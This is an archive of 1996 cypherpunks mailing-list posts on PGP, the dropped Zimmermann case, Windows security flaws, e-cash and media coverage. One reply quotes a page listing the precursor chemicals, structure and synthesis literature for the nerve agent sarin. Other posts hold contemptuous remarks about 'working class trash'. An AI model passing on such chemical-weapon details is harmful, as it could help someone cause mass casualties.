From: anonymous-remailer@shell.portal.com
Date: Fri, 12 Jan 1996 12:35:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601120425.UAA08583@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The other day I was poking around lists of open NNTP servers, and came across something odd at llyene.jpl.nasa.gov . It appears that nothing has ever been expired there. Some groups had hundreds of thousands of messages.

This might be interesting and useful for some purposes.

Anyone know if that's where Dave Hayes does his amazing administrative thing?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 13 Jan 1996 01:15:41 +0800
To: cypherpunks@toad.com
Subject: [CORRECTION] Microsoft continues to mislead public about Windows security
In-Reply-To: <199601120042.TAA18188@bb.hks.net>
Message-ID: <Pine.ULT.3.91.960111181406.5422B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In a couple of silly posts, I'd uncritically repeated a Bob Cringely piece
in the December 10th InfoWorld (plus various other sources) without
adequately verifying the facts. I hope this will clear some things up. 

First, NT was C2-certified in a specific configuration as a standalone
workstation only, not as a network server. So any points about NT's C2
security being compromised by the following problems are *moot* and should
be ignored.

1. NetWare Services lets you know when you try to log on as a user that 
   doesn't exist, rather than asking for a password. Real NetWare servers 
   do the right thing.

2. Because of a common user error, documentation errors, and a couple bugs,
   it is possible to gain read-only access to the root directory of many 
   NT FTP servers (20% of the known NT servers at Stanford when I checked --
   this has been fixed) by giving a nonexistent username and password,
   for example, cypherpunks/cypherpunk, to Microsoft's FTP server.

These aren't important, because Microsoft does not claim that NT Server,
as a server, is C2-secure; only many authorized distributors do. 

Also, the note that NetWare was C2-certified is misleading. I've been 
told and find credible (but have not verified) that NetWare was only 
certified in an unusual environment with packet-encrypting NICs.

The rest was true. The main point was that Microsoft continues to make
statements that are clearly at variance with the truth concerning the 
acknowledged .PWL, IPX SAP, and SMB bugs, among others. 

Microsoft has yet to revise several known incorrect pertinent articles in
their "Knowledge" Base technical/marketing database, which you can search
via: 

  http://www-leland.stanford.edu/~llurch/win95netbugs/kb.html

Incorrect articles include Q92588, Q90210, Q36634, Q103887, Q120554, and
especially Q90271.

The specific URL for each of these articles is:

  http://www.microsoft.com/kb/peropsys/windows/{ID}.htm

For example, the article that purports to contain technical information on
why you can trust the security of .PWL files is: 

  http://www.microsoft.com/kb/peropsys/windows/Q90271.htm

Also, http://www.windows.microsoft.com/windows/software/mspwlupd.htm, the
PR on the "fix" for the acknowledged .PWL bugs in Win95 (the same bugs
exist in Windows 3.11, but Microsoft has not acknowledged this or
committed to fixing it), is clearly incorrect. It says that the new
algorithm is 2^96 times more secure because it uses a larger key. Besides
the fact that the extreme weakness of the .PWL algoritm has nothing
whatsoever to do with the key size, the new algorithm does not use 128
random bits. Like many other exportable algorithms, the key size is 128
bits, but only 40 bits are random. 

By the way, neither I nor the comp.risks moderator have heard a peep from
any Microsoft source in any newsgroup or mailbox. This I find somewhat
disheartening. We know that there are at least five microsoft.com
addresses on cypherpunks because we all got bounced email when Microsoft
broke their mail gateway. 

Cat got your tongue?

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 ftp://ftp.demon.co.uk/pub/mirrors/win95netfaq/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
 http://www.mari.su/guide/win95/faq.html
 rich@c2.org
 http://www.c2.org/hackmsoft/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Sat, 13 Jan 1996 01:00:08 +0800
To: adam@lighthouse.homeport.org
Subject: Cryptolib & Crypto++
In-Reply-To: <199601120023.TAA22279@homeport.org>
Message-ID: <9601120145.AA09274@vongole.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



What are Cryptolib & Crypto++?

-James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 12 Jan 1996 18:58:11 +0800
To: grimm@MIT.EDU
Subject: Re: Cryptolib & Crypto++
In-Reply-To: <9601120145.AA09274@vongole.MIT.EDU>
Message-ID: <199601120225.VAA22645@homeport.org>
MIME-Version: 1.0
Content-Type: text


grimm@MIT.EDU wrote:

| What are Cryptolib & Crypto++?

Cryptolib is a package by Jack Lacy of AT&T.  It provides a C library
interface to a variety of useful crypto algorithims.  Includes
bignums, standard ciphers, a truerand, public key time quantization,
some other stuff.


	Crytpo++ is a C++ library by Wei Dai.  Its original
implementation was pulled after RSA threw lawyers around.  Version 1.1
was released recently with RSA cooperation.  It includes a very large
number of algorithims, including all the usual ones (DES, IDEA, rsa)
and some less common ones: Lubyrack, diamond, rc5.  It also has random
number, compression, hash functions, zeroknowledge, secret sharing,
ascii armoring, etc.  If I used C++, this would be all I needed.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 12 Jan 1996 14:01:55 +0800
To: Ryan Lackey <cypherpunks@toad.com
Subject: Re: E-cash and Interest
Message-ID: <ad1b9cb404021004ea3f@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:52 PM 1/11/96, Ryan Lackey wrote:
<SNIP>
>By integrating all of these services under Mark Twain Bank Ecash Mint, I
>would get all of the advantages of a rather pricey bank, 4-5% loss on all
>my deposits, minimal privacy protection, no FDIC protection, $2500
                                                               ^^^^^
>initial deposit (not a problem for me, but it does keep many of the
>people I'd like to send money to out of the system..always a feature),
>and _tens_ of places to spend my ecash, only 4 or 5 of which that really
>sell things.
>

Where do people keep getting this number. I have an account, my initial
deposit was $36 ($11 for startup and $25 to play with).

>--
>Ryan Lackey -*- ryan@pobox.com -*- http://www.netaxs.com/people/ryan/


        -Lance



----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Fri, 12 Jan 1996 18:49:46 +0800
To: "Michael C. Peponis" <cypherpunks@toad.com
Subject: Re: Shimomura on TV?
Message-ID: <2.2.16.19960112025408.2fd72342@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:15 PM 1/11/96 +0000, Michael C. Peponis wrote:
>
>> Has anyone heard anything else about this? I am getting real sick of the
>> media's portrayal of the internet. They never say anything good about it. If
>> they were to mention C2's system they would say how it is a no-rules server
>> to hide thugs and pornos from the police. I am getting sick of watching this
>> trash. The whole realm of the internet and computers and their associated
>> areas are very dear to me I am sick of the media bludgeoning them to death.
>
>Douglas,
>
>Why let it bother you? You must understand that the majority of the 
>population of the United States is working class trash, the news 
>media is just peddeling to the masses, just like the morons that hold 
>elected office.
>
>They can keep up the bitching, but that's a good thing, I encourage 
>the spread of this kind of disinformation, it keeps even more of the 
>masses from getting on for fear of being offenced.
>
>Regards,
>Michael Peponis
>PGP Key Avalible form MIT Key Server,or via finger
>
>
Mr. Peponis,
 I see what you are saying but doesn't it bother you the slightest bit? I
guess it is the principle of the whole thing for me. Look at us. Members of
a group that's purpose is to make computers free. We read hundred's and
hundred's of messages a week talking about crypto and legal stuff, because
we care about what happens on a economic, civil and most importantly a
personal level. I don't know it just bothers me that they are dragging
something so important to me throught the mud. They never mention the good
stuff like the OK City support group page, the use in schools, the
effectiveness of the internet as a research tool. And most of the time their
"internet" is AOL.
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Sat, 13 Jan 1996 04:47:33 +0800
To: cypherpunks@toad.com
Subject: Re: Shimomura on TV?
Message-ID: <2.2.16.19960112025419.2fd733a2@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:38 PM 1/11/96 -0500, hallam@w3.org wrote:
>
>>Has anyone heard anything else about this? I am getting real sick of the
>>media's portrayal of the internet. They never say anything good about it.
>
>At the last World Wide Web consortium meeting I said that the media were
>pumping up the bubble and their favourite game is to see if they can 
>destroy what they have the arrogance to imagine they created.
>
>That is why we have to replace the press. Consider this in the next 
>election voters on the Internet will be able to read the press releases
>of the candidates without the press filtering them. There is the potential
>for the internet citizens to participate in shaping the political agenda 
>- another role the press likes to usurp for itself.
>
>I recently held a workshop on political use of the Web which was attended
>by Republican and Democrat party workers and political activists from
>6 other countries. One thing that suprized me was the consensus amongst the
>politicians that the differences between them were smaller than their 
>differences with the press.
>
>To take one example. A collumnist in the New York Times recently received
>much coverage for calling the First Lady "a congenital liar". Yet little 
>mention is made of the fact that said collumnist worked for both Nixon and
>Spiro Agnew and has never condemned either for their actions. 
>
>
>	Phill
>
>
It is disgusting to me. I would really like to do something about it. I use
to have a sig file(s) that said:

"The revolution will not be televised but the proceeedings will be available
oonline."

During the french revolution someone said "Look their is a revolt" And
another replied "No, a revolution." Or something to that affect. But anyway
I say we as a community do something. Look around the potential is here for
something big e.g. C2.org
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 12 Jan 1996 16:36:03 +0800
To: cypherpunks@toad.com
Subject: Re: US DoJ Zimmermann Press Release
In-Reply-To: <gkxRbZe00YUqBRA6Nd@andrew.cmu.edu>
Message-ID: <199601120600.WAA09559@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Declan B. McCullagh" <declan+@CMU.EDU> writes:

> [logo]                                        United States Attorney
> Northern District of California

> Norther District of California, announced today that his office
> has declined prosectution of any individuals in connection with 
> the posting to USENET in June 1991 of the encryption program

Cool -- that means Kelly Goen is also off the hook, which is also a big
relief!

	Jim Gillogly
	Sterday, 21 Afteryule S.R. 1996, 05:59




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Sat, 13 Jan 1996 00:41:40 +0800
To: cypherpunks@toad.com
Subject: Re: Certificates: limiting your liability with reuse limitations
Message-ID: <199601120400.VAA26163@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


In Minnesota, you wouldn't be liable.
All you can do IS all you can do.
Anything else is a crime! (on their part).

Love Always,

Carol Anne

At 05:07 PM 1/11/96 -0800, you wrote:
>You write:

>How do notaries public get around this liability problem?  It seems to me
>that the checking done for a certificate might be similar to the checking
>done by a notary - a glance at a driver's license, say.  Are they subject
>to liability if they are fooled by fake ID?
>
>Hal
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 12 Jan 1996 17:47:06 +0800
To: cypherpunks@toad.com
Subject: US DoJ Zimmermann Press Release
Message-ID: <gkxRbZe00YUqBRA6Nd@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From Mike Godwin and Stanton McCandlish. Transcribed from fax.

-Declan

-----------





 [begin]
 
 
 
 [logo]                                        United States Attorney
                                      Northern District of California
 
 _____________________________________________________________________________
 
 
                         San Jose Office                   (408) 535-5061
                         280 South First Street, Suite 371
                         San Jose, California 95113       FAX: (408) 535-5066
 
 
                             PRESS RELEASE
 
 
 FOR IMMEDIATE RELEASE
 January 11, 1995
 
 
 
        Michael J. Yamaguchi, United States Attorney for the
 
 Norther District of California, announced today that his office
 
 has declined prosectution of any individuals in connection with 
 
 the posting to USENET in June 1991 of the encryption program
 
 known as "Pretty Good Privacy."  The investigation has been 
 
 closed.  No further comment will be made by the U.S. Attorney's 
 
 office on the reasons for declination.
 
        Assistant U.S. Attorney William P. Keane of the U.S.
 
 Attorney's Office in San Jose at (408) 535-5053 oversaw the 
 
 government's investigation of the case.
 
 
 [end]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William T. Rainbird" <rainbird@smartlink.net>
Date: Fri, 12 Jan 1996 21:00:38 +0800
Subject: reach out!
Message-ID: <30F609CC.3C03@smartlink.net>
MIME-Version: 1.0
Content-Type: text/plain


I know this isn't a typical posting for this group, but I thought I'd 
point out that O.J. Simpson has a video for sale, to further exploit his 
carnage. 
You can buy it by dialing 1-800-OJTELLS 1-800-658-3557 it is a FREE CALL 
(for you).  
I guess that means the MERCHANT PAYS for the calls, even if NOTHING IS 
ORDERED...

Please repost and tell your friends!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tim@dierks.org (Tim Dierks)
Date: Fri, 12 Jan 1996 15:51:28 +0800
To: cypherpunks@toad.com
Subject: Re: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
Message-ID: <v0213050aad1bbc9c9645@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:00 AM 1/10/96, Bill Stewart wrote:
>At 11:15 PM 1/6/96 -0500, Michael Handler <grendel@netaxs.com> wrote:
>>    ftp://ds.internic.net/rfc/rfc1876.txt
>>Again, I'm not too sure of the viability of this proposal. Not on
>>effectiveness of proving true location -- it is more geared toward
>>"visual 3-D packet tracing" -- but simply because I have _no_ fricking
>>idea where our machines are (in terms of lat and long) to any degree
>>of accuracy.
>
>There are several geography servers on the net, which can tell you
>the lat/long for a city (more useful if your city is, say,
>Holmdel NJ than if it's Los Angeles.)

For what it's worth, you can use the mapping software at
<http://tiger.census.gov> to find your location fairly accurately; you may
need another map to locate yourself, since the streets are unlabeled. I
managed to figure out that I'm currently at latitude 37.3435 degrees,
longitude -121.8925 degrees. I think that's correct to within about 100
feet or so.

 - Tim

Anyone with a GPS device, feel free to stop by; I'm in unit A2, and I've
got homebrew in the fridge.


Tim Dierks - Software Haruspex - tim@dierks.org
If you can't lick 'em, stick 'em on with a big piece of tape. - Negativland






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 12 Jan 1996 14:08:44 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601120546.XAA04381@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Since there is no longer an ongoing investigation, perhaps now would be
a good time to file FOIA requests to see if there is evidence of the Justice
Department acting improperly.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 13 Jan 1996 16:34:37 +0800
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601120811.AAA25133@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations, Phil!  And to all the EFF folks, Phil's lawyers, et al.

At 07:00 PM 1/11/96 -0600, ecarp@netcom.com wrote:
>Mike Godwin can speak to this a lot better than I can, but I believe that 
>by abandoning their case against PRZ, they have seriously weakened their 
>case against anyone else that they feel has violated the ITAR in a 
>similar manner - it's called "selective enforcement" and courts have been 
>taking a dim view of that sort of thing.

They've weakened it far less than if they'd indicted Phil and lost,
and they _would_ have lost if they'd had a trial.  
Indicting him would have done _him_ far more damage, of course,
so I'm glad for his sake they dropped it.  
(Dan Bernstein may disagrees on whether they'd lose, and his suit against
the government is the next chance to test this in court.)

Prosecuting Kelly Goen would have been far more interesting;
they _might_ have been able to win something against him,
though the statute of limitations is probably about to cover him.

Meanwhile, they've demonstrated that you can tie up a person for years,
and cause him to spend huge legal expenses, without being stopped by the
Constitutional right to a speedy trial, and by not prosecuting they're
preserving the powers of Fear, Uncertainty, and Doubt.
And while they've given PGP some extra publicity, they've also slowed
down the adoption of high-quality privacy tools for several years;
while they can't prevent hard-core privacy-addicts from getting it,
but they can make sure that it's not included in everybody's first
computer for a couple of years at least, until they get Clipper 2
or Exon 3 or Freeh-base Wire Taps or _something_ in place.

And they can always argue that "Well, the case against Phil didn't
have quite enough direct evidence to prosecute, but we caught SAMEER
and three of his customers Red-handed, and plan to prosecute those
crypto-narco-anarco-porno-terrorist Commie-sympathizing Nazi-protecting
Foreign-looking money-laundering EEEVIL conspirators from BERKELEY
to the fullest extent of the law!*" and spend a couple of years
harassing them, and then find another victim after that.

Enough of those cases in a row could eventually annoy a judge or two,
but if it gets them a few more years, it gets them a few more years.


====
* Oh, "and your little dog, too!"
====

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Jan 1996 17:04:21 +0800
To: tim@dierks.org (Tim Dierks)
Subject: Re: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
Message-ID: <m0taf3v-0008yVC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 PM 1/11/96 -0800, you wrote:

>For what it's worth, you can use the mapping software at
><http://tiger.census.gov> to find your location fairly accurately; you may
>need another map to locate yourself, since the streets are unlabeled. I
>managed to figure out that I'm currently at latitude 37.3435 degrees,
>longitude -121.8925 degrees. I think that's correct to within about 100
>feet or so.
>
> - Tim
>
>Anyone with a GPS device, feel free to stop by; I'm in unit A2, and I've
>got homebrew in the fridge.


About 10 years ago, I bought a Loran unit from Heath, and (due to my
association with some people who did laser photoplotting for PC boards) had
a program written which generated a "LAT/LON" map plastic overlay.  Apply
over a USGS 7.5 minute map, and you can read LAT/LON directly.  (It only
needed to be photoplotted once, of course:  positive contact printing
duplicated it easily.)

Only one problem:  Since the width of longitude changes with latitude, a
given map overlay can only be "exactly" accurate at one latitude. Still, it
made estimating LAT/LON FAR easier.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Jan 1996 16:58:00 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: [Sarin?] Re: When they came for the Jews...
In-Reply-To: <Pine.3.89.9601111125.A14193-0100000@netcom14>
Message-ID: <Pine.ULT.3.91.960112003415.6769B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996, Lucky Green wrote:

> On Wed, 10 Jan 1996, Duncan Frissell wrote:
> 
> > He cited the posting of instructions for making explosive devices, including
> > recipes for Sarin nerve gas and bombs similar to the one that destroyed the
> > Federal Building in Oklahoma City last April 19.
> 
> Sarin nerve gas? Can anyone find that URL?
> 
> TIA,

You're kidding, right? With all the uncensored spiders out there, anybody
can find anything in a second. Search for "sarin not japan not aum" to cut
down on the noise. Here's two of the top ten from AltaVista.

1. For US Occupational Health and Safety Administration (OSHA)
   recommendations regarding Sarin (um... avoid?), see:

   http://www.skcinc.com/niosh/file_1424.html

2. Sorry, no detailed recipe, and it says "don't try this at home," but there
   is a bibliography, and the Stanford Libraries have four of the journals
   listed. 

    From http://www.xmission.com/~seer/mcw/sarin.html

Sarin is now known as "GB." It has several chemical names:
1-Methylethyl methylphosphonate, Isopropylhydrogen
methylphosphonate or Isopropyl methylphosphonate. Note the
word "isopropyl." One of the key ingredients of the Sarin made by AUM
Shinrikyo is isopropyl alcohol. Altogether there are four ingredients in
Sarin: phosphorus trichloride, sodium fluoride, isopropyl alcohol
and acetonitrile. Its chemical structure is as follows:
(H3C)2CHOPF(O)Me. Sarin is not the type of weapon that can be made in
the home, it can only be manufactured in a laboratory, though very
sophisticated equipment is not needed. It is extremely dangerous to
manufacture and handle.

It's a German invention. Here's a (mostly) German Bibliography.
GMELINS HDB, 1965, P482; PHOSPHOR VERBINDUNGE, 1963, V1, P433;
PHOSPHOR ERBINDUNGE, 1964, V2, P27; 810930, 1959, CHILDS AF;
ARBUSOV A, 1902, P1639; CHEM ZENTR BOOTH HS, 1939, V61, P2927; J AM
CHEM SOC; BRAUER G, 1975, P209; HDB PRAPARATIVEN ANO; BRYANT PJR,
1960, P1553, J CHEM SOC; DEBORST C, 1972, V27, P305, TNO NIEUWS;
FORDMOORE AH, 1951, V31, P33, ORGANIC SYNTHESES; FRANKE S, 1976,
V1, LEHRBUCH MILITARCHEM; FRANKE S, 1976, V2, LEHRBUCH
MILITARCHEM; KUHN SJ, 1962, V40, P1951, CAN J CHEM; LORQUET JC,
1959, V68, P336, B SOC CHIM BELG; SAMMET R, 1983, THESIS ETH ZURICH;
SASS S, 1979, V14, P257, ORG MASS SPECTROM; SCHRADER G, 1963,
ENTWICKLUNG NEUER IN; TAMMELIN LE, 1957, V11, P1340, ACTA CHEM
SCAND; WASER PG, 1983, CHOLINERGE PHARMAKON; WASER PG, 1975,
CHOLINERGIC MECHANIS; WASER PG, 1986, P157, DISCOVERIES PHARM;
WASER PG, 1986, P743, DYNAMICS CHOLINERGIC. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@netaxs.com>
Date: Fri, 12 Jan 1996 14:31:37 +0800
To: loki@obscura.com (Lance Cottrell)
Subject: Re: E-cash and Interest
In-Reply-To: <ad1b9cb404021004ea3f@[137.110.24.250]>
Message-ID: <199601120620.BAA14910@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text


In one of many possible worlds, Lance Cottrell did say:
 
> Where do people keep getting this number. I have an account, my initial
> deposit was $36 ($11 for startup and $25 to play with).

It's the amount required to earn interest on a World Currency Access account.
I was incorrect in assuming it was the minimum to start an account...it's 
just the minimum _I_ would have it in, because I do not like savings 
accounts which don't draw interest unless they're held in gold, offshore, 
or both.

-- 
Ryan Lackey -*- ryan@pobox.com -*- http://www.netaxs.com/people/ryan/
"Calmly and impersonally, she, who would have hesitated to fire at an 
 animal, pulled the trigger and fired straight at the heart of a man 
 who had wanted to exist without the responsibility of consciousness."
                                       -- Ayn Rand, _Atlas Shrugged_.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 12 Jan 1996 18:50:14 +0800
To: cypherpunks@toad.com
Subject: AP story on PGP
Message-ID: <199601120310.EAA03281@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


U.S. Attorney Won't Prosecute Author of Computer Encryption Program
By ELIZABETH WEISE=
AP Cyberspace Writer=
	   SAN FRANCISCO (AP) - A software writer won't be prosecuted for a
program he wrote that was put on the Internet and is now widely
used by computer users to keep their communications secret, the
government said Thursday.
	   Philip Zimmermann's Pretty Good Privacy encryption program turns
computer messages into a jumble of numbers and letters unreadable
to anyone except the intended recipient.
	   The code is so unbreakable that it is classified as munitions
under the Arms Export Control Act, making its export without a
license a felony.
	   Federal prosecutors began investigating Zimmerman in 1993 after
the program appeared on the Internet global computer network.
Zimmerman said that others put it there, not him.
	   The government opposes export of cryptographic technology for
fear it will make it harder to monitor electronic communications
overseas, and domestic law enforcement agencies are concerned such
programs could keep them from eavesdropping on digital
conversations.
	   U.S. Attorney Michael J. Yamaguchi announced the decision not to
prosecute Zimmerman, but didn't say why. If convicted, Zimmermann
would have faced 51 months in prison.
	   ``I'm just really pleased that the sword of Damocles is not over
me anymore and I wonder why it took so long,'' Zimmermann said in a
phone interview from his home in Boulder, Colorado.
	   ``This is not just for spies anymore. It's for the rest of us.
The information age is here. The rest of us need cryptography to
conduct our business.''
	   The case had been closely watched as computer users and the
government square off over free speech and privacy rights.
	   Some critics contended it was foolish of the government to claim
that Zimmerman had broken the law because the same coding
information forbidden for export electronically may be shipped
abroad in print form. They also noted that the technology already
circulates throughout the world, making the law unenforceable.
	   ``Zimmermann never exported Pretty Good Privacy, so the U.S.
Attorney seemed to be missing the point. Unfortunately there still
is no clear ruling from our government as to whether or not making
software available on the Internet counts as exporting it,'' said
Simson Garfinkel, who wrote a book about the program.
	   Zimmerman's supporters argued that without encryption,
government could do widespread eavesdropping, perhaps for political
reasons, scanning for words and phrases it considers subversive.
They acknowledge that a few criminals may use programs like PGP to
hide out in cyberspace, but believe that concern is outweighed by
free speech and privacy rights.
	   ``The case was part of the government effort to crack down on
good technologies for privacy. We hope the government's decision
signals a rethinking of federal policy in this very important
area,'' said Marc Rotenberg of the Electronic Privacy Information
Center in Washington, an on-line civil rights watchdog group.
	   Others see the 2.5-year investigation of Zimmermann as
intimidation.
	   ``It seems to me is that all the U.S. Attorney is saying is that
they don't want the public relations nightmare of prosecuting
Philip Zimmermann, but they still want everyone scared so that they
won't exercise their Constitutional rights,'' Garfinkel said.
	   ---
	   Pretty Good Privacy is available on the World Wide Web at
http://www.epic.org/privacy/tools.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 17:47:43 +0800
Subject: No Subject
Message-ID: <QQzyef08529.199601120925@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Got this off the web - it's a link to the letter that Phil got from the 
US attorney:

http://www.eff.org/pub/Alerts/usatty_pgp_011196.announce

U.S. Atty. DROPS PGP INVESTIGATION!
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPXZYyS9AwzY9LDxAQG4BgP+PmA6GoUSMCpnvUfo+1v1MpFX0pdg66jN
Foo5yuT+G2fIG1m+K4aVrZusPHhC+tHjx2kaMqn0ZSE9nC8U32blpt01+CE+xgp3
x4q5L6llkyEK4oWSrnjbZImcjm3VIrAiaj8S3+qGfAz3FEZ5ChJZ2Q4J91lsqv5z
3FY/xiKqu60=
=Nrr2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 20:14:55 +0800
Subject: No Subject
Message-ID: <QQzyeg09662.199601120943@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> From: Michael C. Peponis <mianigand@unique.outlook.net>
> To: cypherpunks@toad.com
> 
> Why let it bother you? You must understand that the majority of the 
                                                      ^^^^^^^^
> population of the United States is working class trash, the news 
                                     ^^^^^^^^^^^^^^^^^^^
                                     Hope you're including yourself in that.

> media is just peddeling to the masses, just like the morons that hold 
                ^^^^^^^^^
                Can't spell - *must* be working class trash...

> elected office.
> 
> Regards,
> Michael Peponis
          ^^^^^^^
          Tell me: is the 'po' silent?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 18:13:25 +0800
Subject: No Subject
Message-ID: <QQzyeh10491.199601120955@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


For once, Thatcher said it best: 
	"Just Rejoice."

However, Churchill said it better: 
	"This is not the end. This is not the beginning of the,
	 but rather the end of the beginning". 

But has Phil sold the photos to a tabloid yet?

Simon

 (defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 12 Jan 1996 18:14:11 +0800
Subject: No Subject
Message-ID: <QQzyeh10584.199601120957@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First of all, let me apologize for not being very knowledgable about CA's
